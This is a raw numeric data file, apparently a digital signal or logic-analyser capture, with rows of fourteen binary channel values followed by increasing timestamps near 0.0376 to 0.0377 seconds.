1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596348e-02 1,0,1,1,0,0,0,0,0,1,0,0,0,0,3.7596352e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7596356e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7596372e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7596396e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7596424e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7596448e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7596476e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7596500e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7596524e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7596548e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7596572e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7596596e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7596652e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7596676e-02 1,0,1,1,0,1,0,0,0,0,0,0,0,0,3.7596680e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596684e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596824e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596848e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596876e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596948e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7596972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7596996e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597024e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597048e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597076e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597100e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597124e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597148e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597172e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597196e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597224e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597248e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597276e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597300e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597324e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597348e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597372e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597396e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597428e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597448e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597476e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597500e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597524e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597596e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7597604e-02 1,0,1,1,0,1,0,0,0,1,0,0,1,0,3.7597648e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7597676e-02 1,0,1,1,0,1,0,0,0,0,0,0,0,0,3.7597680e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597684e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597700e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597724e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597748e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597772e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597796e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597824e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597848e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597876e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597900e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597924e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597948e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7597972e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7597996e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598024e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598048e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598076e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598100e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598124e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598148e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598172e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598196e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598224e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7598972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7598996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599676e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599824e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599848e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599876e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599900e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7599972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7599996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600076e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600100e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600124e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600148e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600172e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600196e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600224e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600248e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600276e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600300e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600324e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600348e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600372e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600396e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600424e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600448e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600476e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600500e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600524e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600548e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600572e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600596e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600624e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600648e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600672e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600700e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600724e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600748e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600772e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600796e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600820e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600844e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600868e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600896e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600924e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600948e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7600972e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7600996e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7601024e-02 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7601048e-02 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7601072e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7601100e-02 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.7725844e-02 0,0,1,1,0,1,0,0,0,1,0,0,0,1,3.7726036e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7726060e-02 0,1,1,1,0,1,0,0,0,1,0,1,0,1,3.7726088e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7726112e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,1,3.7726416e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,3.7726444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7726448e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7726468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7726492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7726516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7726540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7726564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7726592e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7726616e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,1,3.7726644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,1,3.7726668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7726676e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7726692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7726716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7726740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7726764e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7726792e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7726844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7726868e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7726872e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7726892e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7726916e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7726964e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7726992e-02 0,1,1,1,0,1,0,0,0,0,0,0,0,0,3.7726996e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727000e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727016e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727068e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727164e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727188e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727212e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727236e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727288e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727388e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727436e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727464e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727488e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7727492e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7727540e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7727564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727636e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727664e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727688e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727788e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727812e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727836e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727864e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7727888e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7727916e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7727964e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7727988e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7727996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728012e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728036e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728064e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728088e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728116e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728140e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728164e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728188e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728212e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728236e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728288e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728388e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728436e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728492e-02 0,1,1,1,0,0,0,0,0,1,0,0,0,0,3.7728516e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7728520e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7728540e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7728564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728636e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728664e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728688e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728788e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728812e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728836e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728864e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728888e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7728964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7728988e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729012e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729036e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729064e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729088e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729116e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729140e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729164e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729188e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729212e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729236e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729264e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729288e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729316e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729340e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729364e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729436e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7729444e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7729464e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7729488e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7729540e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7729564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729588e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729612e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729636e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729664e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729688e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729716e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729740e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729764e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729788e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729812e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729836e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729864e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729888e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729916e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729940e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7729964e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7729988e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730012e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730036e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730064e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730088e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7730116e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,3.7730164e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,3.7730188e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730212e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730236e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730264e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730288e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730316e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730340e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730364e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730388e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730412e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730436e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730464e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730488e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730516e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730540e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730564e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730588e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730612e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730636e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730664e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730688e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730716e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730740e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730764e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730832e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730852e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730876e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730932e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7730956e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7730980e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731036e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731060e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731084e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731104e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731124e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731148e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731172e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731216e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731240e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,3.7731260e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,3.7731284e-02 